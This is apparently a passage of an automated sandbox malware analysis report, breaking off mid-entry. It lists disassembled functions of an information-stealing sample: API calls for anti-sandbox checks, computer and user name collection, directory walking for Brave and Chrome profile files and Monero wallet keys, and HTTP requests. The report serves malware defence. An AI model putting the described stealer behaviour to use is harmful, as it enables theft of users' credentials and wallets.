
                                • Executed
                                • Not Executed
                                control_flow_graph 1450 8c6af3 1451 8c6b0a 1450->1451 1453 8c6b0c-8c6b22 call 8c6920 call 8c5b10 CloseHandle ExitProcess 1451->1453 1454 8c6aba-8c6ad7 call 8caad0 OpenEventA 1451->1454 1460 8c6ad9-8c6af1 call 8caad0 CreateEventA 1454->1460 1461 8c6af5-8c6b04 CloseHandle Sleep 1454->1461 1460->1453 1461->1451
                                APIs
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,007B8A28,?,008D110C,?,00000000,?,008D1110,?,00000000,008D0AEF), ref: 008C6ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 008C6AE8
                                • CloseHandle.KERNEL32(00000000), ref: 008C6AF9
                                • Sleep.KERNEL32(00001770), ref: 008C6B04
                                • CloseHandle.KERNEL32(?,00000000,?,007B8A28,?,008D110C,?,00000000,?,008D1110,?,00000000,008D0AEF), ref: 008C6B1A
                                • ExitProcess.KERNEL32 ref: 008C6B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                • String ID:
                                • API String ID: 941982115-0
                                • Opcode ID: b5d9942bb194ebc6fda76319c478e3f320b8db9b6a71a0206385dade77032d5c
                                • Instruction ID: 20bc5a5a7c9f2724ca74ad7bc0b69ebfaff665456889316a377680740c29e44b
                                • Opcode Fuzzy Hash: b5d9942bb194ebc6fda76319c478e3f320b8db9b6a71a0206385dade77032d5c
                                • Instruction Fuzzy Hash: AEF03AB0940219ABE700EBE0AC06FBE7B74FB14705F104528B506E11C1EBB0A941DA97

                                Control-flow Graph

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 008B4839
                                • InternetCrackUrlA.WININET(00000000,00000000), ref: 008B4849
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1274457161-4251816714
                                • Opcode ID: fa592a6c45f4e59edfe1a939bba15480a27be0615505f4ba02594daca698793e
                                • Instruction ID: 947e80041e85bff3aaddae5e84eb9ef008b995c4b24b7a210466f379d9bb0533
                                • Opcode Fuzzy Hash: fa592a6c45f4e59edfe1a939bba15480a27be0615505f4ba02594daca698793e
                                • Instruction Fuzzy Hash: AB2150B1D01209ABDF14DF95E845BDE7774FB45310F108625F515AB2C0EB706609CB91

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 008CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008CA7E6
                                  • Part of subcall function 008B6280: InternetOpenA.WININET(008D0DFE,00000001,00000000,00000000,00000000), ref: 008B62E1
                                  • Part of subcall function 008B6280: StrCmpCA.SHLWAPI(?,007BE270), ref: 008B6303
                                  • Part of subcall function 008B6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008B6335
                                  • Part of subcall function 008B6280: HttpOpenRequestA.WININET(00000000,GET,?,007BD9C8,00000000,00000000,00400100,00000000), ref: 008B6385
                                  • Part of subcall function 008B6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008B63BF
                                  • Part of subcall function 008B6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008B63D1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008C5228
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                • String ID: ERROR$ERROR
                                • API String ID: 3287882509-2579291623
                                • Opcode ID: 83ed5332cd8b7d6a2ef2580786273cf6d015ecdf7b116ea2323fff81cfd05ed0
                                • Instruction ID: ef5d49e5a2a07779406ab927212faf99e1595ec8821318920c9b008ef976491b
                                • Opcode Fuzzy Hash: 83ed5332cd8b7d6a2ef2580786273cf6d015ecdf7b116ea2323fff81cfd05ed0
                                • Instruction Fuzzy Hash: 4411CB7091054CA7DB18FB68D996FED7378FF50344F808168A81A9A592EF34AB05C692
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 008B112B
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 008B1132
                                • ExitProcess.KERNEL32 ref: 008B1143
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$AllocCurrentExitNumaVirtual
                                • String ID:
                                • API String ID: 1103761159-0
                                • Opcode ID: 8a99fa60f6aa55b7ff305d2ee62fadf23372258a2905f6e5407d3d537208ee74
                                • Instruction ID: b5510184267298bf988ef18117d657e186ecd9c544e3e3e59bdabbfd8d3c5992
                                • Opcode Fuzzy Hash: 8a99fa60f6aa55b7ff305d2ee62fadf23372258a2905f6e5407d3d537208ee74
                                • Instruction Fuzzy Hash: C1E086B0945308FBEB10ABE4DC0EB9876B8EB04B41F500044F70CBA2C0C6F42602DADA
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 008B10B3
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 008B10F7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocFree
                                • String ID:
                                • API String ID: 2087232378-0
                                • Opcode ID: d00395ec1e9c84853918a65ce34641fa5d478bae88db014b8b365ee45a20f9f5
                                • Instruction ID: 50bec8ae606f18d8b47d9f8e59d03268b54bb398214985bb96a7154e675b4f77
                                • Opcode Fuzzy Hash: d00395ec1e9c84853918a65ce34641fa5d478bae88db014b8b365ee45a20f9f5
                                • Instruction Fuzzy Hash: A2F0E9B1641204BBEB14E6E49C59FFAB7E8E705715F300448F508E7380D571AE04CA91
                                APIs
                                  • Part of subcall function 008C78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008C7910
                                  • Part of subcall function 008C78E0: RtlAllocateHeap.NTDLL(00000000), ref: 008C7917
                                  • Part of subcall function 008C78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 008C792F
                                  • Part of subcall function 008C7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008B11B7), ref: 008C7880
                                  • Part of subcall function 008C7850: RtlAllocateHeap.NTDLL(00000000), ref: 008C7887
                                  • Part of subcall function 008C7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 008C789F
                                • ExitProcess.KERNEL32 ref: 008B11C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AllocateName$ComputerExitUser
                                • String ID:
                                • API String ID: 3550813701-0
                                • Opcode ID: 40939a954a9ef492dbd4447e4eee1f796b4dbd751868e4cbe5973b29edcb31c5
                                • Instruction ID: 1faa67b937546689a74e32cd1a768832267aa55ace0bae00ad4ffd3e279b0f33
                                • Opcode Fuzzy Hash: 40939a954a9ef492dbd4447e4eee1f796b4dbd751868e4cbe5973b29edcb31c5
                                • Instruction Fuzzy Hash: D4E0ECA595420152DA10B3F9AC1AF6A32ACFB24745F040428FA09D6202FA35E805C96B
                                APIs
                                • wsprintfA.USER32 ref: 008C38CC
                                • FindFirstFileA.KERNEL32(?,?), ref: 008C38E3
                                • lstrcat.KERNEL32(?,?), ref: 008C3935
                                • StrCmpCA.SHLWAPI(?,008D0F70), ref: 008C3947
                                • StrCmpCA.SHLWAPI(?,008D0F74), ref: 008C395D
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 008C3C67
                                • FindClose.KERNEL32(000000FF), ref: 008C3C7C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 1125553467-2524465048
                                • Opcode ID: f534b85400b192e581000a687d6c2caddaa3cc8de26d239b34a945a45a95217b
                                • Instruction ID: b1291e3588ba92e15bc88f4ecd081e80256ff04423de9318b4e984331c07cb25
                                • Opcode Fuzzy Hash: f534b85400b192e581000a687d6c2caddaa3cc8de26d239b34a945a45a95217b
                                • Instruction Fuzzy Hash: EAA13FB1A002189BDB24EBA4DC85FFE7378FB58300F04859DA51DD6141EB759B85CFA2
                                APIs
                                • wsprintfA.USER32 ref: 008C492C
                                • FindFirstFileA.KERNEL32(?,?), ref: 008C4943
                                • StrCmpCA.SHLWAPI(?,008D0FDC), ref: 008C4971
                                • StrCmpCA.SHLWAPI(?,008D0FE0), ref: 008C4987
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 008C4B7D
                                • FindClose.KERNEL32(000000FF), ref: 008C4B92
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s$%s\%s$%s\*$0{
                                • API String ID: 180737720-108428910
                                • Opcode ID: 59cd38d2348b55597cb4b7840dddd26a6a60c9a255bcb20a6799d3bc94cf18f0
                                • Instruction ID: 0acd325df9cf9db86344cbcd45be7052c9767af2d318b23d8076353537d24007
                                • Opcode Fuzzy Hash: 59cd38d2348b55597cb4b7840dddd26a6a60c9a255bcb20a6799d3bc94cf18f0
                                • Instruction Fuzzy Hash: E86123B1500218ABCB24EBE4DC59FFA7778FB58700F04859CA50DD6141EA75EB89CFA2
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008CA920: lstrcpy.KERNEL32(00000000,?), ref: 008CA972
                                  • Part of subcall function 008CA920: lstrcat.KERNEL32(00000000), ref: 008CA982
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                • FindFirstFileA.KERNEL32(00000000,?,008D0B32,008D0B2B,00000000,?,?,?,008D13F4,008D0B2A), ref: 008BBEF5
                                • StrCmpCA.SHLWAPI(?,008D13F8), ref: 008BBF4D
                                • StrCmpCA.SHLWAPI(?,008D13FC), ref: 008BBF63
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 008BC7BF
                                • FindClose.KERNEL32(000000FF), ref: 008BC7D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 3334442632-726946144
                                • Opcode ID: 3cda1b38200577289d89ae82eacc883ec952ec6031080b28740fcba6b98d7785
                                • Instruction ID: cf1e88ad99e2c3a763c24cf5a5a8cc35d0cbbeff33e7ac43df07d90889a1c255
                                • Opcode Fuzzy Hash: 3cda1b38200577289d89ae82eacc883ec952ec6031080b28740fcba6b98d7785
                                • Instruction Fuzzy Hash: 7B421172910108ABCB18FBA4DD96EED7379FB54304F40856CB50AD6191EE34EB49CBA3
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 008C4580
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008C4587
                                • wsprintfA.USER32 ref: 008C45A6
                                • FindFirstFileA.KERNEL32(?,?), ref: 008C45BD
                                • StrCmpCA.SHLWAPI(?,008D0FC4), ref: 008C45EB
                                • StrCmpCA.SHLWAPI(?,008D0FC8), ref: 008C4601
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 008C468B
                                • FindClose.KERNEL32(000000FF), ref: 008C46A0
                                • lstrcat.KERNEL32(?,007BE130), ref: 008C46C5
                                • lstrcat.KERNEL32(?,007BD2A0), ref: 008C46D8
                                • lstrlen.KERNEL32(?), ref: 008C46E5
                                • lstrlen.KERNEL32(?), ref: 008C46F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                • String ID: %s\%s$%s\*$0{
                                • API String ID: 671575355-2992801943
                                • Opcode ID: a023ae1475e9592de8dba3c5969a57660c59baa50cdfabe4570b833df23ef76e
                                • Instruction ID: c411f66a21dc04e7dbce422e370659d893394eb97306d4242ef106ae4e1d2500
